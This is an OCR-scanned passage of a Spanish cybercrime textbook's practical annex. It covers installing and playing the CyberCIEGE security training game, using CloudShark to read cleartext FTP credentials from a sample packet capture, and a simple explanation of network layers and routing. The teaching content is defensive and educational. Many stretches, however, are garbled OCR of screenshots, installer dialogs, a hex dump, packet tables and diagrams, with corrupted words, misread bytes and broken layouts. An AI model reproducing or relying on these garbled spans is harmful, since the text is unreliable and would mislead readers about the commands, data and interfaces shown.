- 291 -
Cibercriminalidad.
Cuarta parte. ANEXO. CASOS PRÁCTICOS

2.1. Instalación deljuego


Puede obtener una versión de demostración del juego Cyberciege en el
siguiente enlace: http://my.nps.edu/web/c3o/downloads. En la página web
podemos descargar una versión de evaluación desde el enlace evaluation
copy.

Free Evaluation Copy


A free evaluation copy is available here: eva!uation copy Thís versío,
CyberCIEGE, contact Scott Gallardo at Rivermind lnc sgallardQ(á?rivi:

Para su instalación basta con hacer doble clic en el ejecutable descar-


gado.

Welcome to the CyberCIEGE


Setup Wizard

lt is recommeoded that 'IOU dose aff other applicalions befure


conlínu,,g.

Cid< Next to continue, or cancel to exit Setup.

1,: Next~ : 1 L_.~I J

- 292 -
l . PRÁCTICAS DE SEGURIDAD INFORMÁTICA

En la siguiente pantalla, tras hacer clic en "Next" debemos aceptar la li-


cencia del software:

License Agre:em~t
Please read the foUowing importan! lnformation before continulng.

Please read the foBowing li<ense Agreement You must accept the terms of this
agreement before continué,g .,,,tt,
the inStallation.

Cvt,escIEGE lustrales ccmputer and network security conc.epls. 1he game


indudes a sophlsticated sómulation of effucts of security d,oic.es on the ability to [ii_-·,_•
enforce spedfic information sea.irity polides in different operational ::A
em,i-onments. lhe simulation is fur illustr ative purposes and should not be
construed as a tool for assessing the security of any actual or proposed network.
A variety of different computer and network components and different Q,ds of
software are lnduded in the game, 1hese are not intended to represen! ,w,y
actual products.

CyberGIEGI: was created by RNennind Inc. and 1he Center for the Information
Systems Studles and Researd, (CISR) at the N.!val Postgraduate School.

\~\ I acc.ept the agreement


C) Ido not acrept the agreement

< 8adc j[ Next > 11 . Cancel

Luego debemos seleccionar donde vamos a instalar el programa en


nuestro equipo y como se va a llamar en el menú de inicio de Windows :

t,J Setup
,..
- CyberCIEGE
. .. ->,
;;<" , -- ~;.

5"1ect Destination Location


Where should CyberOEGE be instaUedl

l .- Setup w~ instan CyberC!EGE into lhe fulowing folder,

To continue, dic:k Next. If yoo would like to sl!iect a dlfferent folder, dickBrowse.
s.1ifil.:2JilmiiiiWli'~ - ·- .. 1 Browse,..

At least 270,1 MB of free dst<space is required.

293
Cibercriminalidad.
Cuarta parte. ANEXO. CASOS PRÁCTICOS

~ Setup - Cybe<C!EGE

Select Start He nu Folder


Where should Setup piare the program's shortcuts?

D. Setup \\il crea te the prOQram's shortcuts in the foilowing Start Menu folder.

To continue, did<Next. If you wooldlil<e to selecta diffierent fulder, dickBrowse.

< Back _ H !'le~t > ,l l. Caoc.el

Tras configurar las opciones del asistente podernos comenzar a instalar


el juego en sí haciendo clic en "Install":

¡jS.tup :'.' CyberC!EGE

Ready to Instal
Setup is now ready to begin installing CyberCIEGE on yOU' computer.

Click Install to coalinue with the inst>!lation, ar cid< 8ack lf you want to review or
change anysettings.

bestinatíon iocatíon:
C: 'frogram Fres (x86)'j:yberCIEGE

Start Menu fulder:


CyberCIEGE

- 294 -
l . PRÁCTICAS DE SEGURIDAD INFORMÁTICA

La instalación suele tardar unos instantes:

·e Setup • Cybe!CIEGE
lnstalling
Please wail ,.+,Je Setup inslalls CvberCIEGE on YOI.I' computer,

Extracting files ...


C: 'Progr.-m Ales (x86)\CyberCIEGE\Ccs• ~re~ib\li~fiica'l.lbr•vllle

Cancel .

Antes de finalizar la instalación se nos muestra más información relacio-


nada con el uso y aplicación del juego:

-~ S•tup • Cyb.,,(!EGE

Information
?tease read the f-o!lowing important lnformation before continuing.

When you are ready to contlnue wilh S.tup, dick Next

CyberCIEGE README Flle


Version l. 9v8s
Seprember 22, 2017

CyberC!EGE is an infurmalion assurance (!A) tralnin!l tnol lhat illustrates


mputer and network serunty principies through simu!ation and reSOU'ce
t trade-offs. CyberCIEGE players construc.t computer networks and
· es affecting the ability of these n•tworks and the vir tual users
ID protect valuable assets trom attad< by bolh vandals and w~ motivated
professionals.

If 'fOU are reading this fi-om a CD, you can either ínstaD 1he game on a
computer or you can run the garoe directly off ofthe co. Run the
'R.un CyberCIEGE• batch file and then make your cho,ce., the resulting =•en.

295
Cibercriminalidad.
Cuarta parte. ANEXO. CASOS PRÁCTICOS

Y por último terminamos la instalación:

Completing the CyberCIEGE Setup


Wizard
Setup has fnished installing CyberCIEGE on your computer.
The appecation may be launched by selecting the instal!ed

Cick Finish to exit Seb.Jp.

Dado que la versión disponible es una versión de demostración solo po-


demos utilizar el juego durante 20 minutos, así como no podemos guardar
partidas. Sin embargo, estas restricciones no afectan a la actividad.

2.2. Jugamos

Si todo ha ido bien dispondremos de un icono de acceso del juego en


nuestro escritorio, lo que nos permite iniciar el juego:

- 296 -
l. PRÁCTICAS DE SEGURIDAD INFORMÁTICA

Tras el inicio del juego, su aspecto es el siguiente:

Campaigns
~.. ...,
Starting Scenaríos
E:n<:ryptioll ldentity l heft
I<lent!ty Management Pa.%WOrds
Mandat o1y M.C1'b'S Collt'rols
Network Traffk: Analysi,;
Navy SCenarto Starus

Hot st11ted

PLAY CLOSE
VIEWLOG 1

En este caso nos centraremos en la campaña "Training" y en el escenario


"Stop Worns". Una vez seleccionadas estas opciones podemos comenzar a ju-
gar haciendo clic en "Play".
Esto nos abrirá el escenario del juego:

- 297 -
Cibercriminalidad.
Cuarta parte. ANEXO. CASOS PRÁCTICOS

Este escenario nos indica la siguiente información:


"Trabajas para BortSoft. Cada vez que llega un nuevo empleado aparece un
ataque de virus y gusanos, lo que conlleva una gran pérdida de productividad.
Te han asignado la responsabilidad de evitar que los nuevos emplea-
dos diseminen virus y gusanos mediante el correo electrónico. Joe acaba de
llegar a la empresa. Ha estado todo el día en orientación y ahora mismo
solo tiene sitio en la cabeza para una instrucción. ¿Qué debe hacer o no?"
Haz clic en Ok para comenzar."
Tras hacer clic podemos ver el escenario completo:

- 298 -
l . PRÁCTICAS DE SEGURIDAD INFORMÁTICA

En la parte de la derecha tenemos el estado del juego, por ejemplo, en


este caso el juego está pausado y hay 2000$ que puede gastar en medidas de
seguridad, así como información sobre el usuario en pantalla. En la parte de
la derecha nos encontramos con una animación 3D de la empresa.
En la parte superior vemos una serie de pestañas que nos ayudarán con
nuestro cometido:
• Game, nos muestra información sobre el escenario que estamos ju-
gando.
• Objectives, nos lista los objetivos del escenario actual.
• Asset, lista los recursos de la empresa.
• User, te muestra información sobre los usuarios en la empresa.
• Component y Zone permiten aplicar controles de seguridad a nivel
de equipo o a nivel de Zona. Es aquí donde podrás trabajar en este
escenario.

En este caso trabajará a nivel de componente, sobre el equipo de Joe. En-


tre las acciones que puede ejecutar se encuentran opciones como:
o Bloquear el correo electrónico.
o No permitir archivos adjuntos en el correo.
o

- 299 -
Cibercriminalidad.
Cuarta parte. ANEXO. CASOS PRÁCTICOS

• Network, nos muestra información relacionada a la red y nos permi-


te conectar y desconectar equipos a la red.
Si se ha fijado, hasta ahora el juego está detenido. Tras realizar los cam-
bios que considere oportunos puede iniciar el juego haciendo clic en el botón
de "play" del juego.

Se aplicarán las medidas de seguridad que haya elegido y verá los resul-
tados en el escenario.

El juego le irá informando de las acciones que ocurren. Por ejemplo, en


este caso vemos como a Joe le ha llegado un correo con un salvapantallas de
gatitos. El juego le advertirá de los posibles riesgos, así como su impacto en la
empresa.
Si las medidas aplicadas son las correctas, tras la fase de aplicación en-
trará en una fase de quiz, donde deberá decidir qué hacer con base en unos
supuestos.

- 300 -
l. PRÁCTICAS DE SEGURIDAD INFORMÁTICA

Le proponemos dos enfoques: primero intentar resolver el objetivo del


juego, después deje que desarrolle el escenario sin intervenir. ¿Qué ocurre
conforme se va desarrollando el juego?

2.3. Reflexiones
Dentro del escenario debemos tener en cuenta que:
• Una de las mayores causas de proliferación de software malicioso
es la ejecución por parte del usuario de archivos adjuntos de correo
electrónico.
• Los virus a menudo proliferan al leer la libreta de direcciones de co-
rreo electrónico de un usuario y enviarse como un archivo adjunto a
esas direcciones.
• Los gusanos a menudo proliferan al ejecutarse primero como un ar-
chivo adjunto a un correo electrónico y luego explotar las vulnera-
bilidades de la red local para propagarse a otras máquinas sin inter-
vención adicional del usuario.
• En muchos casos, una empresa no puede operar razonablemente sin
el uso de archivos adjuntos de correo electrónico. Por lo tanto, los
usuarios necesitan ayuda para distinguir los archivos adjuntos de co-
rreo electrónico "ejecutables" de otras formas de archivos adjuntos
de correo electrónico.
• Incluso los archivos adjuntos de correo electrónico no ejecutables
(por ejemplo, ".doc" o ".pdf") tienen cierto potencial para distribuir

- 301 -
Cibercriminalidad.
Cuarta parte. ANEXO. CASOS PRÁCTICOS

software malicioso. Este riesgo a menudo se reduce mediante el uso


de software antivirus.
Por tanto, vemos como algo tan simple como administrar el correo elec-
trónico debe encontrar un equilibrio entre los procesos de negocio de la or-
ganización y la seguridad de los sistemas de información.

3. Cuestionario

• ¿Se le ocurre alguna situación similar en su entorno?


• ¿Cómo se ha llegado a un equilibrio entre ambas necesidades?
• ¿Es necesario solo formar al empleado para resolver estas situaciones?
• ¿Cómo cree que debería reflejar esta situación una política de seguridad?
Por último, al superar este escenario se habilitarán nuevos escenarios.
Le animamos a que los juegue para saber más sobre la seguridad.

- 302 -
PRACTICAN. 2. INFORMACIÓN EN LA RED

l. Objetivos

La información que viaja a través de una red en muchos casos está dis-
ponible para fisgones.
En la siguiente actividad le proponernos que averigüe por usted mismo
cómo podría una atacante descubrir información transmitida a través de una
red no protegida.

2. Desarrollo de la actividad

2.1. Un sniffer
Es una aplicación orientada a atrapar toda la información que viaja a tra-
vés de una red tanto cableada corno inalámbrica. Entre sus múltiples funcio -
nes permite a los administradores de la red conocer el rendimiento de la mis-
ma. Sin embargo, un capturador de la información de la red no autorizado
puede ser una clara amenaza para nuestra organización.
Vamos a usar la aplicación CloudShark para analizar una conversación
entre dos equipos a través de una red. Podernos abrir la traza que vamos a
analizar usando el enlace siguiente: https://www.cloudshark.org/captures/
abdc8742488f
El aspecto una vez abierto es el siguiente:

- 303 -
Cibercriminalidad.
Cuarta parte. ANEXO. CASOS PRÁCTICOS

~-~!
l.W,h.,,1.,t,l Ul.: ♦ ~,~.U~ :~ ~t
:.uz,tp ~,;i.as.! ,>U \U.1«.:.ni m a,

l (U!:l!
r1.1.1u- . .:..n:
; ..u,'!,l ::..tz.:~,.1.:::u
a~:.tu,:1..u:
U♦ ,lU,LlU
:,l.:O . .:c.~u 111.:,t •.:..:~!
m
~
u
Hl
H
'-••-"'' ":
u~u • :1 111::~
J,,t---·
n - U1!< 1.i.er.} : ~ ~ H Y;..-1c1i:
~ !>l, , , _ :,'/.4f
:..:;..¡r
~ t h d • a ~ u r 1 a.u .. nn't Hn
~-n.
,,,#¡>tt.!• <t-.ll •<l-ll:n• u Y<'•' ...
llir,•.UJl, ;..,,..o tS,,• t •i!a.. UU t:;,,,~j¡J;!lH1'1i;l
:o t.c-u:1'1 1u.1n . .:..so :u.u...1.u: n, ~~•u J.u! :-..,
4-~~~ :~.~o.:.u: u;.:(1.!-.u.1 10 n :) ~ n-oH 1>0";; .,• .,..u, u~i 11u...1~n :,o,...;; :,,.,.¡.;<,1n1.un~ ~~.r,I•J.1n1uu
:;:J.;ti;i,!, ~ .-iA, ~

~:, u H~Z~ H1•n2,•r=~n•~~

...
~ , + ~ G t S~ t i , < t > • t f t • ! ~ ~ I ~ ~
~- • ' rt ) ♦ ~ a~ • n •• "" o t f ,r i. u ;o
t: !♦
U
, ti> 1~ !I:: O'J 01 1! 111 Oo !<i P U b U

o
En la parte superior nos encontramos con las herramientas de Clouds-
hark. Usaremos algunas de estas herramientas para averiguar más sobre qué
está ocurriendo.

,. ···- ........ .,_.,_


1 l1nt f\1'1:.t• Mor,Uy F!!t. .
..... .....-,, ·
, J.11Jr,'f _t. c."

En la parte central tenemos una tabla que enumera de todos los mensa-
jes intercambiados en la conversación capturada.

;.;;4::>1~~ ;,¡::,.~!.!.:e-.?
.1.0·21u ~H.~n•.:.:a.z u2.1u.1.:zn
~UdO,J,J.'U .
J.$l,UO !U . .!U.~.:u! :!!.1n, •. 'l"t-l " ;:.~ •• H(H• \J.OC"! Se~,! ~PU wi,.• n-n t,u.~ !~..1- ~euHtt't: .tl'l"f•.'H1:i,.\43.1
z.,c;~; l~.!u.1.u1 :u.a,.:.~u M•i:,0:1.-•1 ~!:j: :.ne-o~:, l.Nt'll ol, nm y ~ ::~,••" ~ .. M:é-1:u~ u v,-..;; pu"'.n~
;.CIH31 ;,u.:u.:.;,~J li l.Jtc . .1.:.u '-'OH - .;1! t~I ,...,..:: ~ . l C !h::,.- r.nJ!I: .t,r.:~ V.,,,,al•!~~:.-1~.1 T!'. .. .:..-J,.,l-;:i."'9t~Ol
.111 1.,:tt;i;. tt~. : f!.!..!U a~-~,e.t.u: ne
ll i,CifU~-- 1.U ..H!'.~.:131 a:: .a&.t.t&;

Cada mensaje en esta tabla tiene los siguientes parámetros:


• Nº : índice en el orden de la conversación;
• Time: segundos transcurridos desde el inicio de la conversación en la
que se envio el mensaje;
• Source: dirección IP del equipo que ha enviado el mensaje, es decir, el
emisor del mensaje;
• Destination: dirección IP del equipo destinatario del mensaje, es de-
cir el receptor del mensaje;
• Protocol: protocolo de comunicación usado para intercambiar men-
sajes entre los equipos;

304
l. PRÁCTICAS DE SEGURIDAD INFORMÁTICA

• Length: número de bytes del mensaje;


• Info: es una breve descripción del mensaje. Si el protocolo es TCP
suele comenzar con número a número, por ejemplo 21 a 46 donde 21
es el puerto usado por el emisor para transmitir el mensaje y 46 es
el puerto del receptor para recibir el mensaje. Si el protocolo es FTP
nos encontramos con el texto transmitido por el protocolo, general-
mente las órdendes dadas al servidor.
Si seleccionamos un mensaje en la tabla anterior en la parte inferior se
carga la información de ese mensaje. En la parte derecha podemos ver el men-
saje codificado en hexadecimal y su correspondiente en ASCII. Por ejemplo, en
el siguiente mensaje podemos ver en la parte izquierda su codificación hexa-
decimal y en la parte derecha, en la codificación ASCII podemos leer los conte-
nidos reales del mensaje (junto con la información de control) que es la línea
ProFTPD l. 3.0a Server (Pro FTPD Anonymous Server) [192.168. 1.231] .

0000 00 17 f2 2e 52 3b 00 13 20 9f 04 2f 08 00 45 10 . . . . R; . .. ./ • . E.
0010 00 7a e6 5c 40 00 '!O 06 cf 21 cO ae 01 e? cO ae .• . ~¡¡_¡¡_ . ! . . . . .
.
0020 . . .. . >.oO ... n .. .
01 b6 oo 15 f2 3e 83 6f 4f fe 04 81 6e da eo 18
0030 .. . g .. ... . < .•. •.
05 ae 99 67 oo oo 01 01 os Oa 3c f6 a9 aa le 8d
00'10 G.220 ProITPD 1 .
0050 47 16 32 32 30 20 50 72 61 46 5'1 50 44 20 31 2e 3.0a Serv~r (Pro
0060 33 2e 30 61 20 53 65 72 76 65 72 20 28 50 72 6f FTPD Anonymous S
0070 46 5'1 SO 44 20 41 6e 6f 6e 79 6d 6f 75 73 20 53 erver) [192.168.
0080 65 72 76 65 72 29 20 5b 31 39 32 2e 31 36 38 2e 1.231] ..
31 2c 32 33 31 5d Od Oa

La parte izquierda de este panel nos muestra la misma información que el


panel de la derecha pero decodificada, de manera que podamos interpretar fá-
cilmente los encabezados y la información de control que acompaña al mensaje.

► Frame 4: 136 byce::s on wire (1088 bits}, 136 by~e:s capt:ured (108S bit:s)
> Echernec II, Src: IncelCo:::: 9f:04:2f {00:13:20:9f:O"t:2f), Dst.: Apple 2e:52:'9b (00:1'
t- I.nccr,ne,; Prococol. Version '¾, Src: 192.168.1.231, O~c: 192.168.1.182-
, 1',.>;!11\!! ~!! -;¡:¡¡¡,:¡ ,_l,l, · ~,:~,;g;;J\?Xti& Jlf, ~t~.Pbi:ti: 620!11, · §eq: 'J.., . Ael<: 1', .I.é'!l:,
..,, File Transt"e:r Prot:ocol (FTP)
► 220 ProITPD 1 . 3,0a Serve:: (ProF'l'PD Anonymou!I Se:rver) { 192.168.1.2.3 1 ) \r\ n
Curren t. work.ina d.irectorv:

Como vernos en la imagen anterior, además nos ayuda a interpretar los


diferentes protocolos de la pila TCP /IP por los que pasa la información:
• Frame 4 está asociado a la transmisión física por el cable, es decir
impulsos eléctricos. En este ejemplo nos indica cuantos bytes se han
capturado en un cable. Podemos hacer clic en los triángulos grises
para averiguar más sobre los campos del encabezado del mensaje. Al
señalar un campo en la parte derecha se resalta en gris sus valores en
hexadecimal y en ASCII.

- 305 -
Cibercrimina!idad.
Cuarta parte. ANEXO. CASOS PRÁCTICOS

• El siguiente nivel es la capa de Enlace. Aquí nos informa que hemos usa-
do el protocolo Ethernet II, y además nos indica la dirección MAC del
emisor (Src: 00: 13:20:9f:04:2f) y la dirección MAC del equipo receptor.
• El siguiente nivel es la capa de Internet, donde nos indica la dirección
IP del emisor, así como la del receptor del mensaje. También nos in-
dica la versión del protocolo IP si desplegamos ese nivel, que en este
caso es la versión 4.
• El siguiente nivel es la capa de transporte, donde encontramos que
se ha usado el protocolo TCP y nos indica los puertos de origen (Src
Port) y destino del protocolo (Dst).
• Por último, tendríamos la capa de aplicación que es la que aporta la
información relevante para el usuario para transportarla.

2.2. Un servidor FTP


En este caso nos encontramos con una conversación con un cliente y
un servidor FTP. File Transfer Protocol (FTP) es un protocolo de la capa de
aplicación que se usa para la descarga de ficheros. El equipo que actúa como
servidor tiene instalada una aplicación que le permite compartir carpetas y
ficheros almacenados en su disco duro. Los equipos clientes se conectan me-
diante un usuario y una contraseña para poder subir ficheros y almacenarlos
en el servidor o bien descargar los ficheros ya almacenados en él.
FTP es un protocolo basado en el intercambio de comandos. Algunos de
los comandos más importantes están resumidos en la siguiente tabla:

- 306 -
l . PRÁCTICAS DE SEGURIDAD INFORMÁTICA

ORDEN DESCRIPCIÓN
USER Indica el nombre de usuario con el que iniciar sesión en un servidor FTP. Suele ir
seguido de la orden pwd acompañado de la contraseña de inicio de sesión.

LS Crea una lista de todos los archivos que se encuentran en el directorio actual. El
comando Is-I brinda información adicional de los archivos.

PWD Muestra el nombre completo del directorio actual.

CD El comando significa change directory (cambiar el directorio) y se usa para pasar a un


directorio diferente. El co mando cd ... se utiliza pa ra tener acceso al directorio principal.

MKDIR El comando mkdir (en UNIX, o md en Microsoft) se utiliza para crear un directorio
dentro del directorio actual.

RMDIR El comando rmdir (en UNIX, o md en Microsoft) se utiliza para eliminar un directorio
dentro del directorio actual.

GET Este comando permite descargar un archivo que se encuentra en el servidor.

PUT Este comando se utiliza para enviar un archivo lo cal al servidor.

QUIT Desconecta el software cliente del servidor FTP y lo coloca en modo inactivo.

Uno de los principales problemas de este protocolo es que no aplica me-


didas de protección a los mensajes de conversación entre el cliente y el ser-
vidor.
Para poder centrarnos solo en los mensajes del protocolo FTP vamos a
escribir en el cuadro de texto de filtrado la cadena "ftp" y hacemos clic en el
campo "Apply", de forma que podamos seleccionar solo los mensajes de este
protocolo:

; ft:p

liJ No. T ime Source Prococol l.engch In.to


..,:,"1r.' f ·¡¡; ~~,:~~ ;.~ '.'i ;_~i -.2:i1 .i~a . _il\3 ..l..1e~ r:tl> ~- 1.j6, " ~~pón~e : z.;O''
6 2 . 5221.99 192 . 168.1.182 192.168.1.231 l"TP 76 Reque.,c: IISER
a 2. 641952 192 . 168. l. 231 192 .168. 1. 182 fT¡> 14;: Re!Jpon-,e: 331
10 4 . 098171 192 .168. 1.182 192.168.1.231 l"TP 76 Reque~t.: PASS
12 <i.. 070595 192 . 168.l.231 192.168.1.182 FTP 117 Rc.spon~ie: 230

Se reduce el número de mensajes ya que CloudShark nos muestra tanto


los mensajes a nivel de TCP como a nivel de aplicación. Recuérdese que los
contenidos de un mensaje de nivel de aplicación pueden repartirse entre uno
o más mensajes TCP. Por eso antes de aplicar el filtro veíamos dos mensajes
TCP precediendo un mensaje FTP: realmente tenernos un mensaje FTP cuya
información se ha transmitido en dos paquetes TCP.

- 307 -
Cibercriminalidad.
Cuarta parte. ANEXO. CASOS PRÁCTICOS

De esta forma vemos más claro quien realiza las peticiones (mensajes
marcados como "Request" en el campo "Info"), que generalmente las realiza
el equipo cliente, y las respuestas (mensajes marcados como "Response" en
el campo "Info"), que generalmente son realizadas por el servidor, a las pe-
ticiones del cliente. Esto también nos permite determinar quién es el equipo
cliente (el emisor de los mensajes "Request") y qué equipo es el servidor FTP
(el emisor de los mensajes "Response" o bien el receptor de las peticiones).
A pesar de todo, si queremos ver cómo funciona la conversación entre
el cliente y el servidor de una manera más sencilla debemos seleccionar el
primer mensaje de la captura y hacer clic en el menú "Analysis Tools" y selec-
cionar la herramienta "Follow Stream".

l Q AnalysisTools ,. .1 '. ~ Gra phs


% Follow Stream
f--u:toh 38 ·,
!O . '- Fl'l?D,?~3 .0a S~~er1 {'Erai31"PD ~~ • 1 Follow St rea
R ftp ,., Ft.,Jlov;( HIP ~ - - -
1 ~nnnvmon.q 1 ooi n ole-~ .RPnrl 1.u1-nr r.omnl ' ... ..J..s ....... :n;_,,.~.,......,......

Se nos abrirá una ventana donde podremos ver toda la información a


nivel de aplicación intercambiada entre ambos equipos:
-----------------------------.,w
Follow TCP Stream Oin ttp.pcap
Shc-WO!"ll)' mis ,;:tr2am f r-me, ct1t ttusst:~am

220 ProFTPO 1.3.0e Serv~ {?rcF'IPD Ar.o:::yn:ou:J S~:rver) [192 . 168.1.231]


USER t::p
~31 -no:::ymou~ 10Q"1-!l ok, ~e:.nd your ccrr¡pl.e te ~.ail addre:zi;, a.!S your pa9s...-ord.
?ASS ft.p
230 Anonymoua. acce:;,;, granted, re~crlc-t.ion" a¡::ply.
S'iST
215 UNIX Type: LS.
aM
211-E'eature:ii:
MDn<
REST STRU.M
StZ'E
'211 f nd

2S7 •r · l.~ current: d1%ect:ocy.


f.?SV
229 En:;erini; !:x.cc:-,ded Pa:s:,ive Modc 111156612 1)
LIS'!
1SO Openi.ng ASCII zwde daca c;onneecion for fil.e 11.st:
l:26 Trar.,5fer ccmplete.
Tt'PE l
200 Type- .set. to I
SlZE ,:e,.sume.doc
213 !912~
Ee3V
229 En~e:-100 ~e..nded v. . . lVC Kocte ll 1 137100 0

- 308 -
l . PRÁCTICAS DE SEGURIDAD INFORMÁTICA

Veremos en azul al equipo que envió el primer mensaje en la captura y


en rojo al otro equipo. Como podemos ver, distinguimos algunos comandos
comunes de FTP, ya descritos en la tabla anterior. Esto nos permite ver la con-
versación completa y los datos enviados y recibidos por el cliente y el servi-
dor FTP, e interpretar la actividad realizada. Especialmente las credenciales
de inicio de sesión. Aunque también vemos en la primera línea el nombre de
la implementación del servidor FTP así como su versión.
Otra representación de la conversación que ha sido capturada es un dia-
grama de escalera (Ladder diagram). Podemos verlo haciendo clic en el botón
"Ladder Diagram" en la parte inferior del diálogo abierto:

!_En_Ur_e _
Co_nve_rso
_ Uo
_n_ _ _ _~ v • ® ASCII Ü HexDump 0 Wraplongfines

Se nos abre una nueva ventana donde podemos ver la conversación, en


este caso tanto TCP en azul como FTP en naranja, representada por una línea
vertical por cada equipo y una flecha horizontal por cada mensaje intercam-
biado. La punta de la flecha apunta al receptor del mensaje y encima encon-
tramos la misma información que en el campo "info" de la tabla anterior.

Protoco l Leddn Vlew: f\p pcap

Para volver a quedarnos solo con los mensajes del protocolo FTP pode-
mos modificar el filtro aplicado escribiendo "ftp" y haciendo clic en el botón
"Apply".

- 309 -
Cibercrimina li dad.
Cuarta parte. ANEXO. CASOS PRÁCTICOS

PTotocol Laddu Vlew: ftp.peap ~ 1!,1,:t"t1~12tnorow.,. - ~

_·,:::,,................ ••=~=-·•-·"""'-••··"";". 6#1 t~~ ~~ ¡~~,;;··-___ -··-·· -~ 1~..:. f~.


192.168.1231 192.168.1.182

RtQl.lf .a lJSERlle

Si además queremos profundizar en la información de los equipos que


participan en la conversación, en la parte izquierda de la barra superior en-
contramos el botón "Endpoints" que va abrir el siguiente diálogo:

V,ewmg 2 [~ ..::::J Endpoi:nts lor ffp pcap

Addreu • Packett ~ Byte!! • Tx PeckelS • T,: Bytes • Rx Pa<kets . ♦ Rx Bytes


192.168 ..1-1 82 . 112 . . - 88l2 62 4364 50 J.1 78
19?__168.1.2.1,! 111 _ 86'!2 50 44 7B 62 . __ ~&!_ _

: {¡)G.!,<?91.i,p
~--•-- ---

En la parte superior izquierda encontramos una lista que nos indica de


qué protocolo está ofreciendo información y en la parte central nos da infor-
mación de los equipos participantes. En este caso estamos viendo informa-
ción relacionada con el protocolo IP en su versión 4:
• Address nos indica las direcciones IP de los participantes.
• Packets y bytes nos dice el número de paquetes y de bytes respecti-
vamente intercambiados en total en toda la captura.
• Tx Packets y Tx Bytes son los paquetes y los bytes respectivamente
transmitidos por el equipo cuya IP está en la fila.
• R:x Packets y R:x Bytes son los paquetes y los bytes respectivamente
recibidos por el equipo cuya IP está en la fila.
Si en la lista de protocolos cambiamos de protocolo a "eth", la tabla cam-
bia, indicando en este caso en lugar de la dirección IP del equipo su dirección
MAC, pero mostrando los mismos datos:

Viewing 2 ~ Endpoints for ftp pcap

Addr916 • Pecl<• t Byt" • T,c, Pockets ♦ :; Bytes . _♦ -{ ; Pac_ke~ ---- • -•• : is~ es
00 17:12:2e:52 Jb .... _ 112 . 8342 62 . 64
.00:13.20.91.04 ·21__ _ 112 8842 _ ......... 50 _. ., ___ _ 4478 ____ .. 62 _ ··- -· 4364 _______ _ _

- 3 10 -
l . PRÁCTICAS DE SEGURIDAD INFORMÁTICA

Si por último cambiamos el protocolo a "tcp", además de la misma infor-


mación que con IPv4, se añade la columna "Ports" que nos indica el puerto
que se ha usado en la conversación.
Tras estos pasos hemos podido recopilar suficiente información sobre
los equipos que han intercambiado información así como la actividad que ha
tenido lugar durante esta captura de red.

3. Cuestionario

Tras analizar la traza de red anterior, responde a las siguientes cuestiones:


• ¿Cuál es la direcciónMAC del equipo cliente?
• ¿Cuál es la dirección MAC del equipo servidor FTP?
• ¿Qué dirección IP tiene el cliente que se conecta al servidor FTP?
• ¿Qué dirección IP tiene el servidor FTP al que se conecta el cliente?
• ¿En qué puerto se conecta el cliente al servidor FTP?
• ¿En qué puerto responde el servidor FTP a las peticiones de los clientes?
• ¿Cuál es el usuario y la contraseña usadas por el cliente para acceder
al servidor FTP?
• ¿Cómo se llama el directorio creado por el usuario en el servidor
FTP?

- 311 -
PRACTICAN. 3. CÓMO EXPLICAR INTERNET A UN ADOLESCENTE

l. Todo el mundo quiere hacer las cosas a su manera, pero, si


queremos comunicarnos, tendremos que ponernos de acuerdo
en al menos cómo hacerlo

Modelos de protocolos

----
Física

Enlace
OSI

Cacharros

Comunicación dentro de la misma red .


--

Identifica nodos de la misma red: direccionamiento


físico.
Ethernet MAC ~macenada en el dispositivo
y es única: fabricante (3 bytes), especie de número de
física

Enlace
TCP/IP

Todos los protocolos

Com unicación dentro de la misma red.

serie-bastidor (3 bytes)
Comunicación entre redes.
Red Direccionamiento J6gico: únicas a nivel mundial
Red Direccionamiento lógico: IP

TCP y UDP. Direccionamiento a punto de


Paquetes: trocear/ordenar
servicio o Puertos. (ya sé que es para mí pero
Puertos o Puntos de servicio (aplicaciones)
resuelve las preguntas: ¿qué es? ¿qué hago
Transporte simultáneos (J;sur.!:Ri !l~!!i!±lllik\l~!;@....): Transporte
con esto?
direccionamiento D punto de servicio o
Navegador-servidor, co rreo con Servidor
direccionamiento a puerto
correo, reproductor.contenido
Sesión Sesiones sesión -t- presentación + aplicación
Presentación Sintaxis y Semántica de datos Aplicación Oiente/servidor y P2P
Aplicación correo,web, .• Direcciones espedficas

313
Cibercriminalidad,
Cuarta parte. ANEXO. CASOS PRÁCTICOS

2. La comunicación y quién conoce quién es quién

2.1. Cómo funciona nuestra red


Supongamos que tenemos cinco máquinas en red: Pedro, Juan, Carolina,
Ana y Eva:
i. Conectadas con un hub. Trabaja en la capa física q Pedro habla a
Juan y su mensaje va por todas partes buscando a Juan. Carolina, Ana y Eva
dicen "mío no es"; cuando le llega, Juan se lo queda.

Capa Física
Usando un hub
Para Juan

Para Juan
121
r;::1111
121 t - . t-

Oi O
Pedro Juan

ii. Conectadas con un switch. Trabaja en la capa de enlace q conoce las


direcciones físicas: Puede direccionar de Pedro a Juan directamente.

Capa enlace BfflMRUfflftlfflll


Pedro 1 cable
Usando un Switch Juan 2 cable
Para Juan
Carolina 3 cable

121 Ana 4 cable


Para Juan Eva 5 cable
r;::1111
~; - - - - - - -:¡:•_L .
Oi o Oi Ana
Oi
Pedro Juan Carolina Eva

- 314 -
l . PRÁCTICAS DE SEGURIDAD INFORMÁTICA

111. Pedro quiere hablar con Sara, que está en otra red. Necesita un dis-
positivo para la conexión entre distintas redes: router.
Mantiene una tabla de encaminamiento. El router doméstico conecta
Red Local con proveedor de servicios.
Capa Internet
Usando un Router
Pedro

Sara

Para Sara

(gl
Red local

Internet
Para Sara

(gl
,;::::zlD
--
servicios

-~ de Sara

Oi Oi Oi Oi
Pedro Juan Ca rolina Ana Eva

2.2. ¿Cómo hablo con los de fuera? ¿Quién soy y quién lo sabe?
i. Envío del mensaje
El proveedor de servicios nos ha puesto un router que se llama Ramón333.
Es el mensajero autorizado, hay muchos Pedros, pero solo un Ramón333 .
Cuando hay una petición, Ramón333 va por el mundo buscando al des-
tinatario.
Pedro quiere hablar con Manolo. No puede hablar con él directamente,
pero Manolo está en una red cuyo mensajero se llama Sara84 7. Ella seguro
que le da el mensaje.
Pedro abre una puerta y habla.
Ramón333 hace lo siguiente:
Apunta en su agenda (tabla de encaminamiento) la pareja Pedro-
Sara847
Sustituye Pedro por Ramón333
Lo envía a Internet

- 316 -
Cibercriminalidad.
Cuarta parte. ANEXO. CASOS PRÁCTICOS

twMll•iiiii
Pedro Sara847

De Ramon333
A Sara847
Sara847

-•
Ramón333
{;,

-o

Pedro
"""71
De Pedro
~ A Manolo Manolo

Pedro quiere hablar con Azucena, que está en otra red. Su mensajera es
Maríalll (única en el mundo) .
Ramón333:
Apunta en su agenda (tabla de encaminamiento) la pareja Pedro-
Maríal 11
Sustituye Pedro por Ramón333
